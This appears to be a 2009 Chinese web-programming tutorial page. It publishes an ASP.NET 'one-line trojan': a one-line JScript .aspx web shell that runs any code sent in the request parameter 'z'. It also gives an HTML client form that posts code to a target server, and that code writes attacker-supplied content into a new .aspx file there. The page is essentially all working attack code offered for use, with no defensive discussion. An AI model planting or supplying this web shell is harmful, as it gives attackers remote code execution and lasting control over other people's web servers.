当前位置: 首页 > 图文教程 > 网络编程 > ASP.NET > asp.net jscript 一句话木马

ASP.NET
blog程序新版本V2.0 Beta完成,提供V1.0全部源码下载
“/”应用程序中的服务器错误
asp.net(c#)复数类(复数加减乘除四则运算)
asp.net(c#)不可访问,因为它受保护级别限制
asp.net(c#) 水仙花数
ASP.NET实现用图片进度条显示投票结果
asp.net(c#) MS AJAX的安装
asp.net(c#)有关 Session 操作的几个误区
ASP.net基础知识之常见错误分析
[.net] 操纵自如-页面内的配合与通信
c# static的全部用法收集整理
使CheckBoxList的Attributes属性生效(修改微软的一个bug)
在ASP.NET中使用Session常见问题集锦
[原创]完美解决Could not load file or assembly ''AjaxPro.2'' or one of its dependencies. 拒绝访问。
在Apache环境下成功的运行ASP.NET的注意事项
ClickOnce DIY全自动更新下载升级的自我实现
asp.net jscript 一句话木马
在ASP.Net中实现flv视频转换的代码
将DataTable中的一行复制到另一个DataTable的方法
在DataTable中执行Select("条件")后,返回DataTable的方法

ASP.NET 中的 asp.net jscript 一句话木马


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 60 ::
收藏到网摘: n/a

min.aspx
复制代码 代码如下:

<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>

复制代码 代码如下:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">
td,table,tr {
list-style: none;
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
line-height: 180%;
}
input,textarea {
width:780px;
}
</style>
<title>aspx一句话木马客户端</title></head>
<body bgcolor="D4D0C8">
<hr>
<table width="100%" border="0" cellpadding="4" cellspacing="0" bgcolor="#D4D0C8">
<form action="sdfsdf" method="post" name="sform" id="sform">
<tr>
<td width="74" align="right" valign="bottom">URL:</td>
<td width="885" valign="bottom"><input name="URL" type="text" id="URL" value="http://" /></td>
</tr>
<tr>
<td align="right" valign="top">操作:</td>
<td><textarea name=z rows=10 width=45>
var nonamed=new System.IO.StreamWriter(Server.MapPath("名称.aspx"),false);
nonamed.Write(Request.Item["l"]);
nonamed.Close();</textarea></td>
</tr>
<tr>
<td align="right" valign="top">写入内容:</td>
<td><p>
<textarea name=l rows=13 width=45></textarea>
<input type="button" value="提交" onclick="javascript:document.sform.action=document.sform.URL.value;submit();" />
</p>
</td>
</tr>
<tr>
<td align="right"> </td>
<td>
<div align="left">
<p>服务端: min.aspx 客户端:client.htm</p>
</div>
</td>
</tr>
</form>
</table>
<hr>
</BODY>
</HTML>